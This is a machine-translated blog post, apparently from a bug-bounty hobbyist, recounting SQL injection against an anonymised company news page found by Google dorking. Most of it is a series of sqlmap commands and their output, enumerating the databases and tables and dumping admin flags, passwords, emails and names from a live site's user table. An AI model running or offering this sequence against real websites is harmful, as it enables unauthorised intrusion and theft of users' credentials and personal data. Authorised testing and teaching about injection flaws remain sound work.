当前位置:网站首页>Record the SQL injection vulnerability of XX company
Record the SQL injection vulnerability of XX company
2022-07-29 05:42:00 【adeylinux】
In the morning , When I get up , My friend , Ask me to participate in public welfare SRC. Then I was dragged to explore public welfare SRC. I opened it. Google Search for :inurl: Science and technology company . Then I opened a website . I previewed the website and found ?id Because of occupational disease . I am here ?id After that, a Single quotation marks ok ah . The page changes . I guess so xss perhaps SQL Inject holes .
Start penetration testing .
take out sqlmap Just a shuttle .
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class="
The result is really flawed . Then continue to test ,
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" --dbs
Here are two libraries :bdm818993245_db,information_schema
Then a shuttle .
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db --tables
bdm818993245_db Under the database 9 A watch :
| user |
| gplat_book |
| gplat_news |
| gplat_newsclass |
| gplat_newsclass2 |
| href |
| job |
| job_add |
| lawyer_wenda |
Next query user The following administrator and password .
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user --columns
Space allowed user The following are 13 Columns :
+-----------+---------------+
| Column | Type |
+-----------+---------------+
| adder | varchar(8) |
| admin | int(2) |
| email | varchar(60) |
| grade | varchar(12) |
| id | int(6) |
| image | varchar(70) |
| name | varchar(60) |
| pass | varchar(60) |
| phone | varchar(14) |
| qianming | varchar(100) |
| times | datetime |
| up_time | datetime |
| xingb | varchar(2) |
+-----------+---------------+
Next query user below admni and pass The data of :
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C admin,pass --dump
Next, collect the data of the database :
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C email --dump
Then collect data :
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C
Query the user name of the administrator :
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C name --dump
The collection is almost done . End the penetration test . I will study the rest of the databases, tables and columns slowly .
summary :
SQl Injection try to use hand injection . Because tools run websites . It's easy to jump .
My public number . Please take care of me .
边栏推荐
- Introduction to C language array to proficiency (array elaboration)
- B - identify floating point constant problems
- Pyqt5: Chapter 1, Section 1: creating a user interface using QT components - Introduction
- Detailed explanation of GPIO input and output
- 使用Qss设置窗体样式
- Liang Yuqi, founder of aitalk: the link between image and virtual reality
- Set the background color of a cell in the table
- ClickHouse学习(三)表引擎
- Clickhouse learning (IV) SQL operation
- Niuke network programming problem - [wy22 Fibonacci series] and [replace spaces] detailed explanation
猜你喜欢
Detailed explanation of serial port communication
ClickHouse学习(六)语法优化
Clickhouse learning (x) monitoring operation indicators
Clickhouse learning (VII) table query optimization
MySQL解压版windows安装
Summary of knowledge points related to forms and forms
[typescript] learn typescript object types in depth
Fvuln-自动化web漏洞检测工具
Day 3
Installation steps and environment configuration of vs Code
随机推荐
Flask 报错 RuntimeError: The session is unavailable because no secret key was set.
DAY14:Upload-labs 通关教程
Summary of knowledge points related to forms and forms
记xx公司SQL注入漏洞
sql-server 数据表的简单操作
JS simple code determines whether the device that opens the page is the PC end of the computer, the H5 end of the mobile phone, or the wechat end
href与src的区别
Clickhouse learning (IX) Clickhouse integrating MySQL
Global components component registration
常见特征工程操作
虚拟增强与现实第二篇 (我是一只火鸟)
ClickHouse学习(十)监控运行指标
Basic concepts of MySQL + database system structure + extended application + basic command learning
js深拷贝-笔记
Longest string without duplicate characters
Pyqt5: Chapter 1, Section 1: creating a user interface using QT components - Introduction
[C language series] - realize the exchange of two numbers without creating the third variable
Common shortcut keys for Ad
Wechat applet - component parameter transmission, state management
Provincial and urban three-level linkage (simple and perfect)